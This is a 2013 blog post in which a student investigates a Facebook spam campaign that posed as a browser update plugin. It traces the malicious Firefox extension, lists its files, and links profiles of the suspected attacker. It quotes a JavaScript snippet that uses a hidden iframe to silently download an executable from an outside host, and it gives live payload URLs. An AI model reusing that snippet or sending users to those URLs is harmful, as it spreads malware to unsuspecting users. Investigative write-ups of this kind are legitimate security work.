A little probe into the Facebook spam “Add plugin to update your browser”

——————————————  DISCLAIMER  —————————————————-

this research might contain sensitive data. Since all data has been exposed by the hacker, I take no responsibility, whatsoever for any kind of data. It was already publicly available.

Also, if some of my findings are wrong, it might be just be the case. I did this for the first time, was half asleep , and excited about my findings.

I am a student, and have nothing to hide (as a hacker). This was purely a research based chase up & academically driven curiosity. I never hosted any illegal data/code, never executed the script and never contacted anyone, whomsoever, may  have been involved in this spam.

If you feel some terms have been used inappropriately, please leave a reply, and I’ll correct them after reviewing the suggestion myself.


 

A note to the Frankenstein:

Hey hacker – Sorry for this (if you shall ever read it) But you just spammed through my friend’s account. And I was equally vulnerable. I was tagged on the fb post and then i found all this crap you made. Go find some clean methods of making money.
And you know what, It is my friend’s birthday today. And he had to apologize to all those tagged ( by all, i mean, a lot of people, he has more than 1000 friends ! )
So, deal with it.  I don’t know about the end results, but, you scoundrel ! burn.

——————————————————————————

*Pssss! hey friend, why you no have 10,000 friends? 😀

——————————————————————————-

Kindly ignore the formatting. I am not getting paid to do this work, hence don’t care !
[ Wrote this in emacs, used some arbitrary line separation arts  and bla bla bla…

Don’t fret on it. Even If you do, i won’t give a damn. ]


Image

possible motivation for hacking >
the guy is motivated by some freedom movement or is a part of a group of hackers, or is just fooling around.

*damn, such a good guess! 😀

hence the message on http://www.kristysteinhaus.com/ in Arabic –
translated:
” We do not know do not accept the threat of mercy
You freedom of expression, Crown Althecar – ”
when googled, Crown Althecar gave link to http://www.sgvv.net/newsdetail.php?id=10
which is actually a hacked website giving a similar message and contains words

like “victim”

ORIGIN :
FB spam http://bb1.co/1005090059 -> redirects to -> http://sarjad.net/theme/id/images/firefox.php
The link says its a browser update and is an add-on, asks us to reload and click update. This then hacks the logged in accounts & starts posting stuff from the victim’s accounts.
The update button actually points to -> http://www.sarjad.net/theme/id/images/ribbons/socialne.xpi

PS: At this stage, people should’ve made some sense out of the URL, before clicking update, atleast check if its from a genuine origin! Anyways..

..so I downloaded and unzipped the spyware. This contained scripts for spamming FB profiles, for infecting Firefox, Chrome, Opera & Safari browsers..
The spammer goes by the handle CasperCrazy (the guy just gave his name in the script file, so sophisticated ! even for a spammer, man he’s decent! the script even contained proper comments & formatting 😀 )

A few searching, i got a few links, out of those,

one is -> http://board.airrivals.net/user/21734-caspercrazy/
another one http://www.dl4hack.com/forum/members/caspercrazy.html

(more mentioned below..)

on further research, i found out, he has also hacked other websites previously and likes to leave his footprints, like on this one:

http://www.kristysteinhaus.com/

and this one http://www.zone-h.org/mirror/id/16635059

More:

http://cdpheritage.org/hacked-by-casper-crazy-here-is-what-i-did-and-why-it-worked/

A small video, shows a girl narrating an incident about how her blog showed hacked one day and when she contacted her geeky boyfriend, he gives her a link which fixes her blog.

She says the link is below the video = > is this another trick? is the girl involved ? when she says its fixed ( and i am hoping she is talking about this link , which still shows hacked, http://www.kristysteinhaus.com/ ), is she promoting something??

However this website clarifies the hacks and also talks about the banking info leaks, as on:

https://docs.google.com/file/d/0B_j9nHbEe0UUS2xNOGtOWUpqMlU/preview?pli=1

..which was given in one of the profiles, of this hacker.

Anyways, This hack which i probed into, is a pretty good way of spamming, and earning money ( which is obvious when i viewed an html file i got from one the spyware links, its written there in French :
“Earn a lot of money in a short time thanks to this system”

Although his profile links suggest he’s linked to anonymous, but i doubt he’s just trying to fool around and earn money through spamming / phishing/ Social engineering.

===========================

Screenshot from 2013-06-21 01:39:39 Screenshot from 2013-06-21 01:33:32 update Screenshot from 2013-06-21 02:31:47 407160666 Screenshot from 2013-06-21 02:24:42 Screenshot from 2013-06-21 01:42:19 Screenshot from 2013-06-21 01:41:51 Screenshot from 2013-06-21 01:54:09

Associated Links [ ..those which i could search in the little time i had, you know, to waste! 🙂 ]
https://docs.google.com/file/d/0B_j9nHbEe0UUS2xNOGtOWUpqMlU/preview?pli=1
https://www.facebook.com/marouankadiri
http://marouan400.wix.com/haker

https://plus.google.com/u/0/116155563105873753223/posts
http://marouan13.wordpress.com/author/marouankadiri/
https://www.facebook.com/pages/Hacker/447686008637563
http://mcbawse177.appspot.com/pastebin.com/u1a6Lxib
http://www.hackarat.jw.lt
http://www.dl4hack.com/forum/members/caspercrazy.html
http://www.reflectgames.com/users.php?id=39481
http://china-cheats.com/member.php?u=6142
http://www.youtube.com/user/crazhacker?feature=watch
https://code.google.com/p/crazyjacks/

============================
reported to :
1. Google https://www.google.com/webmasters/tools/spamreport?hl=en
2. StopBadwarehttps://www.stopbadware.org/report-badware

===========================
http://www.sarjad.net/theme/id/images/ribbons/socialne.xpi

the directory structure of the spyware is:

|– crazyjacks_googleCode
|   |– Facebook-V5.0.2.exe
|   |– new-all.js
|   |– new-allma.js
|   |– new-post.js
|   |– new-postma.js
|   |– new-user.js
|   -- new-userma.js
|-- OpIsrael.xlsx
|-- report.txt
|-- socialne
|   |-- chrome
|   |-- chrome.manifest
|   |-- content
|   |   |-- all.js
|   |   |-- facebook.js
|   |   |-- filescript.xul
|   |   |-- prefman.js
|   |   |-- script-compiler.js
|   |  
— xmlhttprequester.js
|   |– defaults
|   |   -- preferences
|   |      
— prefs.js
|   -- install.rdf— socialne.xpi

6 directories, 19 files

uses the chrome.manifest file as follows:

content filecasper content/

overlay chrome://browser/content/browser.xul chrome://filecasper/content/filescript.xul

uses the Greasemonkey API , uses code from https://code.google.com/p/crazyjacks/

See the commit activity here, it implies its been used recently, also this hack surfaced recently.
Also, the spam link -> http://sarjad.net/theme/id/images/ribbons/urlgen.php -> is present in one of the js files -> new-post.js is a proof this google code repo is used for spamming.

The same repo contains an executable Facebook-V5.0.2.exe spyware ? ( i didn’t execute it yet, to see what happens)

..anyways, the snippet is :

Cookies.init();
if(Cookies.read(“exe_server”) === null) Cookies.create(“exe_server”, “wakhaa”, 30);
if(Cookies.read(“exe_server”) != “baraka”) {
var iframe = document.createElement(‘iframe’);
iframe.style.display = “none”;
iframe.src = “http://crazyjacks.googlecode.com/files/Facebook-V5.0.2.exe?r”+Math.floor(Math.random()*1000000000000);
document.body.appendChild(iframe);

Cookies.create(“exe_server”, “baraka”, 30);

….suggests its using this exe to post stuff from new-all.js  (maybe?)
I didn’t read the code properly, just guessed,

Since, I haven’t fully analyzed it all yet, may be you could help me out? ( I do not have whole day just for this ! )

so once again, all code i could get is present on :
https://code.google.com/p/crazyjacks/ ,
http://www.sarjad.net/theme/id/images/ribbons/socialne.xpi
&
http://sarjad.net/theme/id/images/firefox.php

I used wget to download it safely, unzip on cmdline to inflate the .xpi file, inspect element to observe related JS & links & images being loaded.
For those “who wish to try this at home”, use these precautions (and maybe more? ) or you might end up being a victim ! :/
Hope, an expert is reading this. I am just too curious about this hack, since this is my first spyware research exploration & back tracking experience.
Help me out & keep me posted 🙂

=========================================================

 

Advertisements

3 comments

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s